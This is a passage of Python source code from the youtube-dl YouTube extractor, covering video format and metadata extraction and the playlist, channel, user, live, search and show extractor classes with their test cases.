(format_id, parts_sizes, player_desc))
signature = self._decrypt_signature(
encrypted_sig, video_id, player_url, age_gate)
url += '&signature=' + signature
if 'ratebypass' not in url:
url += '&ratebypass=yes'
dct = {
'format_id': format_id,
'url': url,
'player_url': player_url,
}
if format_id in self._formats:
dct.update(self._formats[format_id])
if format_id in formats_spec:
dct.update(formats_spec[format_id])
# Some itags are not included in DASH manifest thus corresponding formats will
# lack metadata (see https://github.com/rg3/youtube-dl/pull/5993).
# Trying to extract metadata from url_encoded_fmt_stream_map entry.
mobj = re.search(r'^(?P<width>\d+)[xX](?P<height>\d+)$', url_data.get('size', [''])[0])
width, height = (int(mobj.group('width')), int(mobj.group('height'))) if mobj else (None, None)
filesize = int_or_none(url_data.get(
'clen', [None])[0]) or _extract_filesize(url)
quality = url_data.get('quality_label', [None])[0] or url_data.get('quality', [None])[0]
more_fields = {
'filesize': filesize,
'tbr': float_or_none(url_data.get('bitrate', [None])[0], 1000),
'width': width,
'height': height,
'fps': int_or_none(url_data.get('fps', [None])[0]),
'format_note': quality,
'quality': q(quality),
}
for key, value in more_fields.items():
if value:
dct[key] = value
type_ = url_data.get('type', [None])[0]
if type_:
type_split = type_.split(';')
kind_ext = type_split[0].split('/')
if len(kind_ext) == 2:
kind, _ = kind_ext
dct['ext'] = mimetype2ext(type_split[0])
if kind in ('audio', 'video'):
codecs = None
for mobj in re.finditer(
r'(?P<key>[a-zA-Z_-]+)=(?P<quote>["\']?)(?P<val>.+?)(?P=quote)(?:;|$)', type_):
if mobj.group('key') == 'codecs':
codecs = mobj.group('val')
break
if codecs:
dct.update(parse_codecs(codecs))
if dct.get('acodec') == 'none' or dct.get('vcodec') == 'none':
dct['downloader_options'] = {
# Youtube throttles chunks >~10M
'http_chunk_size': 10485760,
}
formats.append(dct)
elif video_info.get('hlsvp'):
manifest_url = video_info['hlsvp'][0]
formats = []
m3u8_formats = self._extract_m3u8_formats(
manifest_url, video_id, 'mp4', fatal=False)
for a_format in m3u8_formats:
itag = self._search_regex(
r'/itag/(\d+)/', a_format['url'], 'itag', default=None)
if itag:
a_format['format_id'] = itag
if itag in self._formats:
dct = self._formats[itag].copy()
dct.update(a_format)
a_format = dct
a_format['player_url'] = player_url
# Accept-Encoding header causes failures in live streams on Youtube and Youtube Gaming
a_format.setdefault('http_headers', {})['Youtubedl-no-compression'] = 'True'
formats.append(a_format)
else:
error_message = clean_html(video_info.get('reason', [None])[0])
if not error_message:
error_message = extract_unavailable_message()
if error_message:
raise ExtractorError(error_message, expected=True)
raise ExtractorError('no conn, hlsvp or url_encoded_fmt_stream_map information found in video info')
# uploader
video_uploader = try_get(video_info, lambda x: x['author'][0], compat_str)
if video_uploader:
video_uploader = compat_urllib_parse_unquote_plus(video_uploader)
else:
self._downloader.report_warning('unable to extract uploader name')
# uploader_id
video_uploader_id = None
video_uploader_url = None
mobj = re.search(
r'<link itemprop="url" href="(?P<uploader_url>https?://www\.youtube\.com/(?:user|channel)/(?P<uploader_id>[^"]+))">',
video_webpage)
if mobj is not None:
video_uploader_id = mobj.group('uploader_id')
video_uploader_url = mobj.group('uploader_url')
else:
self._downloader.report_warning('unable to extract uploader nickname')
# thumbnail image
# We try first to get a high quality image:
m_thumb = re.search(r'<span itemprop="thumbnail".*?href="(.*?)">',
video_webpage, re.DOTALL)
if m_thumb is not None:
video_thumbnail = m_thumb.group(1)
elif 'thumbnail_url' not in video_info:
self._downloader.report_warning('unable to extract video thumbnail')
video_thumbnail = None
else: # don't panic if we can't find it
video_thumbnail = compat_urllib_parse_unquote_plus(video_info['thumbnail_url'][0])
# upload date
upload_date = self._html_search_meta(
'datePublished', video_webpage, 'upload date', default=None)
if not upload_date:
upload_date = self._search_regex(
[r'(?s)id="eow-date.*?>(.*?)</span>',
r'(?:id="watch-uploader-info".*?>.*?|["\']simpleText["\']\s*:\s*["\'])(?:Published|Uploaded|Streamed live|Started) on (.+?)[<"\']'],
video_webpage, 'upload date', default=None)
upload_date = unified_strdate(upload_date)
video_license = self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*License\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li',
video_webpage, 'license', default=None)
m_music = re.search(
r'''(?x)
<h4[^>]+class="title"[^>]*>\s*Music\s*</h4>\s*
<ul[^>]*>\s*
<li>(?P<title>.+?)
by (?P<creator>.+?)
(?:
\(.+?\)|
<a[^>]*
(?:
\bhref=["\']/red[^>]*>| # drop possible
>\s*Listen ad-free with YouTube Red # YouTube Red ad
)
.*?
)?</li
''',
video_webpage)
if m_music:
video_alt_title = remove_quotes(unescapeHTML(m_music.group('title')))
video_creator = clean_html(m_music.group('creator'))
else:
video_alt_title = video_creator = None
def extract_meta(field):
return self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*%s\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li>\s*' % field,
video_webpage, field, default=None)
track = extract_meta('Song')
artist = extract_meta('Artist')
m_episode = re.search(
r'<div[^>]+id="watch7-headline"[^>]*>\s*<span[^>]*>.*?>(?P<series>[^<]+)</a></b>\s*S(?P<season>\d+)\s*•\s*E(?P<episode>\d+)</span>',
video_webpage)
if m_episode:
series = m_episode.group('series')
season_number = int(m_episode.group('season'))
episode_number = int(m_episode.group('episode'))
else:
series = season_number = episode_number = None
m_cat_container = self._search_regex(
r'(?s)<h4[^>]*>\s*Category\s*</h4>\s*<ul[^>]*>(.*?)</ul>',
video_webpage, 'categories', default=None)
if m_cat_container:
category = self._html_search_regex(
r'(?s)<a[^<]+>(.*?)</a>', m_cat_container, 'category',
default=None)
video_categories = None if category is None else [category]
else:
video_categories = None
video_tags = [
unescapeHTML(m.group('content'))
for m in re.finditer(self._meta_regex('og:video:tag'), video_webpage)]
def _extract_count(count_name):
return str_to_int(self._search_regex(
r'-%s-button[^>]+><span[^>]+class="yt-uix-button-content"[^>]*>([\d,]+)</span>'
% re.escape(count_name),
video_webpage, count_name, default=None))
like_count = _extract_count('like')
dislike_count = _extract_count('dislike')
# subtitles
video_subtitles = self.extract_subtitles(video_id, video_webpage)
automatic_captions = self.extract_automatic_captions(video_id, video_webpage)
video_duration = try_get(
video_info, lambda x: int_or_none(x['length_seconds'][0]))
if not video_duration:
video_duration = parse_duration(self._html_search_meta(
'duration', video_webpage, 'video duration'))
# annotations
video_annotations = None
if self._downloader.params.get('writeannotations', False):
video_annotations = self._extract_annotations(video_id)
chapters = self._extract_chapters(description_original, video_duration)
# Look for the DASH manifest
if self._downloader.params.get('youtube_include_dash_manifest', True):
dash_mpd_fatal = True
for mpd_url in dash_mpds:
dash_formats = {}
try:
def decrypt_sig(mobj):
s = mobj.group(1)
dec_s = self._decrypt_signature(s, video_id, player_url, age_gate)
return '/signature/%s' % dec_s
mpd_url = re.sub(r'/s/([a-fA-F0-9\.]+)', decrypt_sig, mpd_url)
for df in self._extract_mpd_formats(
mpd_url, video_id, fatal=dash_mpd_fatal,
formats_dict=self._formats):
if not df.get('filesize'):
df['filesize'] = _extract_filesize(df['url'])
# Do not overwrite DASH format found in some previous DASH manifest
if df['format_id'] not in dash_formats:
dash_formats[df['format_id']] = df
# Additional DASH manifests may end up in HTTP Error 403 therefore
# allow them to fail without bug report message if we already have
# some DASH manifest succeeded. This is temporary workaround to reduce
# burst of bug reports until we figure out the reason and whether it
# can be fixed at all.
dash_mpd_fatal = False
except (ExtractorError, KeyError) as e:
self.report_warning(
'Skipping DASH manifest: %r' % e, video_id)
if dash_formats:
# Remove the formats we found through non-DASH, they
# contain less info and it can be wrong, because we use
# fixed values (for example the resolution). See
# https://github.com/rg3/youtube-dl/issues/5774 for an
# example.
formats = [f for f in formats if f['format_id'] not in dash_formats.keys()]
formats.extend(dash_formats.values())
# Check for malformed aspect ratio
stretched_m = re.search(
r'<meta\s+property="og:video:tag".*?content="yt:stretch=(?P<w>[0-9]+):(?P<h>[0-9]+)">',
video_webpage)
if stretched_m:
w = float(stretched_m.group('w'))
h = float(stretched_m.group('h'))
# yt:stretch may hold invalid ratio data (e.g. for Q39EVAstoRM ratio is 17:0).
# We will only process correct ratios.
if w > 0 and h > 0:
ratio = w / h
for f in formats:
if f.get('vcodec') != 'none':
f['stretched_ratio'] = ratio
self._sort_formats(formats)
self.mark_watched(video_id, video_info)
return {
'id': video_id,
'uploader': video_uploader,
'uploader_id': video_uploader_id,
'uploader_url': video_uploader_url,
'upload_date': upload_date,
'license': video_license,
'creator': video_creator or artist,
'title': video_title,
'alt_title': video_alt_title or track,
'thumbnail': video_thumbnail,
'description': video_description,
'categories': video_categories,
'tags': video_tags,
'subtitles': video_subtitles,
'automatic_captions': automatic_captions,
'duration': video_duration,
'age_limit': 18 if age_gate else 0,
'annotations': video_annotations,
'chapters': chapters,
'webpage_url': proto + '://www.youtube.com/watch?v=%s' % video_id,
'view_count': view_count,
'like_count': like_count,
'dislike_count': dislike_count,
'average_rating': float_or_none(video_info.get('avg_rating', [None])[0]),
'formats': formats,
'is_live': is_live,
'start_time': start_time,
'end_time': end_time,
'series': series,
'season_number': season_number,
'episode_number': episode_number,
'track': track,
'artist': artist,
}
class YoutubePlaylistIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com playlists'
_VALID_URL = r"""(?x)(?:
(?:https?://)?
(?:\w+\.)?
(?:
youtube\.com/
(?:
(?:course|view_play_list|my_playlists|artist|playlist|watch|embed/(?:videoseries|[0-9A-Za-z_-]{11}))
\? (?:.*?[&;])*? (?:p|a|list)=
| p/
)|
youtu\.be/[0-9A-Za-z_-]{11}\?.*?\blist=
)
(
(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)?[0-9A-Za-z-_]{10,}
# Top tracks, they can also include dots
|(?:MC)[\w\.]*
)
.*
|
(%(playlist_id)s)
)""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_TEMPLATE_URL = 'https://www.youtube.com/playlist?list=%s'
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})&[^"]*?index=(?P<index>\d+)(?:[^>]+>(?P<title>[^<]+))?'
IE_NAME = 'youtube:playlist'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
'info_dict': {
'title': 'ytdl test PL',
'id': 'PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
},
'playlist_count': 3,
}, {
'url': 'https://www.youtube.com/playlist?list=PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'info_dict': {
'id': 'PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'title': 'YDL_Empty_List',
},
'playlist_count': 0,
'skip': 'This playlist is private',
}, {
'note': 'Playlist with deleted videos (#651). As a bonus, the video #51 is also twice in this list.',
'url': 'https://www.youtube.com/playlist?list=PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
'info_dict': {
'title': '29C3: Not my department',
'id': 'PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
},
'playlist_count': 95,
}, {
'note': 'issue #673',
'url': 'PLBB231211A4F62143',
'info_dict': {
'title': '[OLD]Team Fortress 2 (Class-based LP)',
'id': 'PLBB231211A4F62143',
},
'playlist_mincount': 26,
}, {
'note': 'Large playlist',
'url': 'https://www.youtube.com/playlist?list=UUBABnxM4Ar9ten8Mdjj1j0Q',
'info_dict': {
'title': 'Uploads from Cauchemar',
'id': 'UUBABnxM4Ar9ten8Mdjj1j0Q',
},
'playlist_mincount': 799,
}, {
'url': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
'info_dict': {
'title': 'YDL_safe_search',
'id': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
},
'playlist_count': 2,
'skip': 'This playlist is private',
}, {
'note': 'embedded',
'url': 'https://www.youtube.com/embed/videoseries?list=PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
'playlist_count': 4,
'info_dict': {
'title': 'JODA15',
'id': 'PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
}
}, {
'url': 'http://www.youtube.com/embed/_xDOZElKyNU?list=PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
'playlist_mincount': 485,
'info_dict': {
'title': '2017 華語最新單曲 (2/24更新)',
'id': 'PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
}
}, {
'note': 'Embedded SWF player',
'url': 'https://www.youtube.com/p/YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ?hl=en_US&fs=1&rel=0',
'playlist_count': 4,
'info_dict': {
'title': 'JODA7',
'id': 'YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ',
}
}, {
'note': 'Buggy playlist: the webpage has a "Load more" button but it doesn\'t have more videos',
'url': 'https://www.youtube.com/playlist?list=UUXw-G3eDE9trcvY2sBMM_aA',
'info_dict': {
'title': 'Uploads from Interstellar Movie',
'id': 'UUXw-G3eDE9trcvY2sBMM_aA',
},
'playlist_mincount': 21,
}, {
# Playlist URL that does not actually serve a playlist
'url': 'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4',
'info_dict': {
'id': 'FqZTN594JQw',
'ext': 'webm',
'title': "Smiley's People 01 detective, Adventure Series, Action",
'uploader': 'STREEM',
'uploader_id': 'UCyPhqAZgwYWZfxElWVbVJng',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCyPhqAZgwYWZfxElWVbVJng',
'upload_date': '20150526',
'license': 'Standard YouTube License',
'description': 'md5:507cdcb5a49ac0da37a920ece610be80',
'categories': ['People & Blogs'],
'tags': list,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
'add_ie': [YoutubeIE.ie_key()],
}, {
'url': 'https://youtu.be/yeWKywCrFtk?list=PL2qgrgXsNUG5ig9cat4ohreBjYLAPC0J5',
'info_dict': {
'id': 'yeWKywCrFtk',
'ext': 'mp4',
'title': 'Small Scale Baler and Braiding Rugs',
'uploader': 'Backus-Page House Museum',
'uploader_id': 'backuspagemuseum',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/backuspagemuseum',
'upload_date': '20161008',
'license': 'Standard YouTube License',
'description': 'md5:800c0c78d5eb128500bffd4f0b4f2e8a',
'categories': ['Nonprofits & Activism'],
'tags': list,
'like_count': int,
'dislike_count': int,
},
'params': {
'noplaylist': True,
'skip_download': True,
},
}, {
'url': 'https://youtu.be/uWyaPkt-VOI?list=PL9D9FC436B881BA21',
'only_matching': True,
}, {
'url': 'TLGGrESM50VT6acwMjAyMjAxNw',
'only_matching': True,
}, {
# music album playlist
'url': 'OLAK5uy_m4xAFdmMC5rX3Ji3g93pQe3hqLZw_9LhM',
'only_matching': True,
}]
def _real_initialize(self):
self._login()
def _extract_mix(self, playlist_id):
# The mixes are generated from a single video
# the id of the playlist is just 'RD' + video_id
ids = []
last_id = playlist_id[-11:]
for n in itertools.count(1):
url = 'https://youtube.com/watch?v=%s&list=%s' % (last_id, playlist_id)
webpage = self._download_webpage(
url, playlist_id, 'Downloading page {0} of Youtube mix'.format(n))
new_ids = orderedSet(re.findall(
r'''(?xs)data-video-username=".*?".*?
href="/watch\?v=([0-9A-Za-z_-]{11})&[^"]*?list=%s''' % re.escape(playlist_id),
webpage))
# Fetch new pages until all the videos are repeated, it seems that
# there are always 51 unique videos.
new_ids = [_id for _id in new_ids if _id not in ids]
if not new_ids:
break
ids.extend(new_ids)
last_id = ids[-1]
url_results = self._ids_to_results(ids)
search_title = lambda class_name: get_element_by_attribute('class', class_name, webpage)
title_span = (
search_title('playlist-title') or
search_title('title long-title') or
search_title('title'))
title = clean_html(title_span)
return self.playlist_result(url_results, playlist_id, title)
def _extract_playlist(self, playlist_id):
url = self._TEMPLATE_URL % playlist_id
page = self._download_webpage(url, playlist_id)
# the yt-alert-message now has tabindex attribute (see https://github.com/rg3/youtube-dl/issues/11604)
for match in re.findall(r'<div class="yt-alert-message"[^>]*>([^<]+)</div>', page):
match = match.strip()
# Check if the playlist exists or is private
mobj = re.match(r'[^<]*(?:The|This) playlist (?P<reason>does not exist|is private)[^<]*', match)
if mobj:
reason = mobj.group('reason')
message = 'This playlist %s' % reason
if 'private' in reason:
message += ', use --username or --netrc to access it'
message += '.'
raise ExtractorError(message, expected=True)
elif re.match(r'[^<]*Invalid parameters[^<]*', match):
raise ExtractorError(
'Invalid parameters. Maybe URL is incorrect.',
expected=True)
elif re.match(r'[^<]*Choose your language[^<]*', match):
continue
else:
self.report_warning('Youtube gives an alert message: ' + match)
playlist_title = self._html_search_regex(
r'(?s)<h1 class="pl-header-title[^"]*"[^>]*>\s*(.*?)\s*</h1>',
page, 'title', default=None)
_UPLOADER_BASE = r'class=["\']pl-header-details[^>]+>\s*<li>\s*<a[^>]+\bhref='
uploader = self._search_regex(
r'%s["\']/(?:user|channel)/[^>]+>([^<]+)' % _UPLOADER_BASE,
page, 'uploader', default=None)
mobj = re.search(
r'%s(["\'])(?P<path>/(?:user|channel)/(?P<uploader_id>.+?))\1' % _UPLOADER_BASE,
page)
if mobj:
uploader_id = mobj.group('uploader_id')
uploader_url = compat_urlparse.urljoin(url, mobj.group('path'))
else:
uploader_id = uploader_url = None
has_videos = True
if not playlist_title:
try:
# Some playlist URLs don't actually serve a playlist (e.g.
# https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4)
next(self._entries(page, playlist_id))
except StopIteration:
has_videos = False
playlist = self.playlist_result(
self._entries(page, playlist_id), playlist_id, playlist_title)
playlist.update({
'uploader': uploader,
'uploader_id': uploader_id,
'uploader_url': uploader_url,
})
return has_videos, playlist
def _check_download_just_video(self, url, playlist_id):
# Check if it's a video-specific URL
query_dict = compat_urlparse.parse_qs(compat_urlparse.urlparse(url).query)
video_id = query_dict.get('v', [None])[0] or self._search_regex(
r'(?:(?:^|//)youtu\.be/|youtube\.com/embed/(?!videoseries))([0-9A-Za-z_-]{11})', url,
'video id', default=None)
if video_id:
if self._downloader.params.get('noplaylist'):
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
return video_id, self.url_result(video_id, 'Youtube', video_id=video_id)
else:
self.to_screen('Downloading playlist %s - add --no-playlist to just download video %s' % (playlist_id, video_id))
return video_id, None
return None, None
def _real_extract(self, url):
# Extract playlist id
mobj = re.match(self._VALID_URL, url)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
playlist_id = mobj.group(1) or mobj.group(2)
video_id, video = self._check_download_just_video(url, playlist_id)
if video:
return video
if playlist_id.startswith(('RD', 'UL', 'PU')):
# Mixes require a custom extraction process
return self._extract_mix(playlist_id)
has_videos, playlist = self._extract_playlist(playlist_id)
if has_videos or not video_id:
return playlist
# Some playlist URLs don't actually serve a playlist (see
# https://github.com/rg3/youtube-dl/issues/10537).
# Fallback to plain video extraction if there is a video id
# along with playlist id.
return self.url_result(video_id, 'Youtube', video_id=video_id)
class YoutubeChannelIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com channels'
_VALID_URL = r'https?://(?:youtu\.be|(?:\w+\.)?youtube(?:-nocookie)?\.com)/channel/(?P<id>[0-9A-Za-z_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/channel/%s/videos'
_VIDEO_RE = r'(?:title="(?P<title>[^"]+)"[^>]+)?href="/watch\?v=(?P<id>[0-9A-Za-z_-]+)&?'
IE_NAME = 'youtube:channel'
_TESTS = [{
'note': 'paginated channel',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'playlist_mincount': 91,
'info_dict': {
'id': 'UUKfVa3S1e4PHvxWcwyMMg8w',
'title': 'Uploads from lex will',
}
}, {
'note': 'Age restricted channel',
# from https://www.youtube.com/user/DeusExOfficial
'url': 'https://www.youtube.com/channel/UCs0ifCMCm1icqRbqhUINa0w',
'playlist_mincount': 64,
'info_dict': {
'id': 'UUs0ifCMCm1icqRbqhUINa0w',
'title': 'Uploads from Deus Ex',
},
}]
@classmethod
def suitable(cls, url):
return (False if YoutubePlaylistsIE.suitable(url) or YoutubeLiveIE.suitable(url)
else super(YoutubeChannelIE, cls).suitable(url))
def _build_template_url(self, url, channel_id):
return self._TEMPLATE_URL % channel_id
def _real_extract(self, url):
channel_id = self._match_id(url)
url = self._build_template_url(url, channel_id)
# Channel by page listing is restricted to 35 pages of 30 items, i.e. 1050 videos total (see #5778)
# Workaround by extracting as a playlist if managed to obtain channel playlist URL
# otherwise fallback on channel by page extraction
channel_page = self._download_webpage(
url + '?view=57', channel_id,
'Downloading channel page', fatal=False)
if channel_page is False:
channel_playlist_id = False
else:
channel_playlist_id = self._html_search_meta(
'channelId', channel_page, 'channel id', default=None)
if not channel_playlist_id:
channel_url = self._html_search_meta(
('al:ios:url', 'twitter:app:url:iphone', 'twitter:app:url:ipad'),
channel_page, 'channel url', default=None)
if channel_url:
channel_playlist_id = self._search_regex(
r'vnd\.youtube://user/([0-9A-Za-z_-]+)',
channel_url, 'channel id', default=None)
if channel_playlist_id and channel_playlist_id.startswith('UC'):
playlist_id = 'UU' + channel_playlist_id[2:]
return self.url_result(
compat_urlparse.urljoin(url, '/playlist?list=%s' % playlist_id), 'YoutubePlaylist')
channel_page = self._download_webpage(url, channel_id, 'Downloading page #1')
autogenerated = re.search(r'''(?x)
class="[^"]*?(?:
channel-header-autogenerated-label|
yt-channel-title-autogenerated
)[^"]*"''', channel_page) is not None
if autogenerated:
# The videos are contained in a single page
# the ajax pages can't be used, they are empty
entries = [
self.url_result(
video_id, 'Youtube', video_id=video_id,
video_title=video_title)
for video_id, video_title in self.extract_videos_from_page(channel_page)]
return self.playlist_result(entries, channel_id)
try:
next(self._entries(channel_page, channel_id))
except StopIteration:
alert_message = self._html_search_regex(
r'(?s)<div[^>]+class=(["\']).*?\byt-alert-message\b.*?\1[^>]*>(?P<alert>[^<]+)</div>',
channel_page, 'alert', default=None, group='alert')
if alert_message:
raise ExtractorError('Youtube said: %s' % alert_message, expected=True)
return self.playlist_result(self._entries(channel_page, channel_id), channel_id)
class YoutubeUserIE(YoutubeChannelIE):
IE_DESC = 'YouTube.com user videos (URL or "ytuser" keyword)'
_VALID_URL = r'(?:(?:https?://(?:\w+\.)?youtube\.com/(?:(?P<user>user|c)/)?(?!(?:attribution_link|watch|results|shared)(?:$|[^a-z_A-Z0-9-])))|ytuser:)(?!feed/)(?P<id>[A-Za-z0-9_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/%s/%s/videos'
IE_NAME = 'youtube:user'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheLinuxFoundation',
'playlist_mincount': 320,
'info_dict': {
'id': 'UUfX55Sx5hEFjoC3cNs6mCUQ',
'title': 'Uploads from The Linux Foundation',
}
}, {
# Only available via https://www.youtube.com/c/12minuteathlete/videos
# but not https://www.youtube.com/user/12minuteathlete/videos
'url': 'https://www.youtube.com/c/12minuteathlete/videos',
'playlist_mincount': 249,
'info_dict': {
'id': 'UUVjM-zV6_opMDx7WYxnjZiQ',
'title': 'Uploads from 12 Minute Athlete',
}
}, {
'url': 'ytuser:phihag',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/gametrailers',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/gametrailers',
'only_matching': True,
}, {
# This channel is not available, geo restricted to JP
'url': 'https://www.youtube.com/user/kananishinoSMEJ/videos',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
# Don't return True if the url can be extracted with other youtube
# extractor, the regex would is too permissive and it would match.
other_yt_ies = iter(klass for (name, klass) in globals().items() if name.startswith('Youtube') and name.endswith('IE') and klass is not cls)
if any(ie.suitable(url) for ie in other_yt_ies):
return False
else:
return super(YoutubeUserIE, cls).suitable(url)
def _build_template_url(self, url, channel_id):
mobj = re.match(self._VALID_URL, url)
return self._TEMPLATE_URL % (mobj.group('user') or 'user', mobj.group('id'))
class YoutubeLiveIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com live streams'
_VALID_URL = r'(?P<base_url>https?://(?:\w+\.)?youtube\.com/(?:(?:user|channel|c)/)?(?P<id>[^/]+))/live'
IE_NAME = 'youtube:live'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheYoungTurks/live',
'info_dict': {
'id': 'a48o2S1cPoo',
'ext': 'mp4',
'title': 'The Young Turks - Live Main Show',
'uploader': 'The Young Turks',
'uploader_id': 'TheYoungTurks',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheYoungTurks',
'upload_date': '20150715',
'license': 'Standard YouTube License',
'description': 'md5:438179573adcdff3c97ebb1ee632b891',
'categories': ['News & Politics'],
'tags': ['Cenk Uygur (TV Program Creator)', 'The Young Turks (Award-Winning Work)', 'Talk Show (TV Genre)'],
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
}, {
'url': 'https://www.youtube.com/channel/UC1yBKRuGpC1tSM73A0ZjYjQ/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/CommanderVideoHq/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/TheYoungTurks/live',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
channel_id = mobj.group('id')
base_url = mobj.group('base_url')
webpage = self._download_webpage(url, channel_id, fatal=False)
if webpage:
page_type = self._og_search_property(
'type', webpage, 'page type', default='')
video_id = self._html_search_meta(
'videoId', webpage, 'video id', default=None)
if page_type.startswith('video') and video_id and re.match(
r'^[0-9A-Za-z_-]{11}$', video_id):
return self.url_result(video_id, YoutubeIE.ie_key())
return self.url_result(base_url)
class YoutubePlaylistsIE(YoutubePlaylistsBaseInfoExtractor):
IE_DESC = 'YouTube.com user/channel playlists'
_VALID_URL = r'https?://(?:\w+\.)?youtube\.com/(?:user|channel)/(?P<id>[^/]+)/playlists'
IE_NAME = 'youtube:playlists'
_TESTS = [{
'url': 'https://www.youtube.com/user/ThirstForScience/playlists',
'playlist_mincount': 4,
'info_dict': {
'id': 'ThirstForScience',
'title': 'Thirst for Science',
},
}, {
# with "Load more" button
'url': 'https://www.youtube.com/user/igorkle1/playlists?view=1&sort=dd',
'playlist_mincount': 70,
'info_dict': {
'id': 'igorkle1',
'title': 'Игорь Клейнер',
},
}, {
'url': 'https://www.youtube.com/channel/UCiU1dHvZObB2iP6xkJ__Icw/playlists',
'playlist_mincount': 17,
'info_dict': {
'id': 'UCiU1dHvZObB2iP6xkJ__Icw',
'title': 'Chem Player',
},
}]
class YoutubeSearchBaseInfoExtractor(YoutubePlaylistBaseInfoExtractor):
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})(?:[^"]*"[^>]+\btitle="(?P<title>[^"]+))?'
class YoutubeSearchIE(SearchInfoExtractor, YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com searches'
# there doesn't appear to be a real limit, for example if you search for
# 'python' you get more than 8.000.000 results
_MAX_RESULTS = float('inf')
IE_NAME = 'youtube:search'
_SEARCH_KEY = 'ytsearch'
_EXTRA_QUERY_ARGS = {}
_TESTS = []
def _get_n_results(self, query, n):
"""Get a specified number of results for a query"""
videos = []
limit = n
url_query = {
'search_query': query.encode('utf-8'),
}
url_query.update(self._EXTRA_QUERY_ARGS)
result_url = 'https://www.youtube.com/results?' + compat_urllib_parse_urlencode(url_query)
for pagenum in itertools.count(1):
data = self._download_json(
result_url, video_id='query "%s"' % query,
note='Downloading page %s' % pagenum,
errnote='Unable to download API page',
query={'spf': 'navigate'})
html_content = data[1]['body']['content']
if 'class="search-message' in html_content:
raise ExtractorError(
'[youtube] No video results', expected=True)
new_videos = list(self._process_page(html_content))
videos += new_videos
if not new_videos or len(videos) > limit:
break
next_link = self._html_search_regex(
r'href="(/results\?[^"]*\bsp=[^"]+)"[^>]*>\s*<span[^>]+class="[^"]*\byt-uix-button-content\b[^"]*"[^>]*>Next',
html_content, 'next link', default=None)
if next_link is None:
break
result_url = compat_urlparse.urljoin('https://www.youtube.com/', next_link)
if len(videos) > n:
videos = videos[:n]
return self.playlist_result(videos, query)
class YoutubeSearchDateIE(YoutubeSearchIE):
IE_NAME = YoutubeSearchIE.IE_NAME + ':date'
_SEARCH_KEY = 'ytsearchdate'
IE_DESC = 'YouTube.com searches, newest videos first'
_EXTRA_QUERY_ARGS = {'search_sort': 'video_date_uploaded'}
class YoutubeSearchURLIE(YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com search URLs'
IE_NAME = 'youtube:search_url'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/results\?(.*?&)?(?:search_query|q)=(?P<query>[^&]+)(?:[&]|$)'
_TESTS = [{
'url': 'https://www.youtube.com/results?baz=bar&search_query=youtube-dl+test+video&filters=video&lclk=video',
'playlist_mincount': 5,
'info_dict': {
'title': 'youtube-dl test video',
}
}, {
'url': 'https://www.youtube.com/results?q=test&sp=EgQIBBgB',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
query = compat_urllib_parse_unquote_plus(mobj.group('query'))
webpage = self._download_webpage(url, query)
return self.playlist_result(self._process_page(webpage), playlist_title=query)
class YoutubeShowIE(YoutubePlaylistsBaseInfoExtractor):
IE_DESC = 'YouTube.com (multi-season) shows'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/show/(?P<id>[^?#]*)'
IE_NAME = 'youtube:show'
_TESTS = [{
'url': 'https://www.youtube.com/show/airdisasters',
'playlist_mincount': 5,
'info_dict': {
'id': 'airdisasters',
'title': 'Air Disasters',
}
}]
def _real_extract(self, url):
playlist_id = self._match_id(url)
return super(YoutubeShowIE, self)._real_extract(
'https://www.youtube.com/show/%s/playlists' % playlist_id)
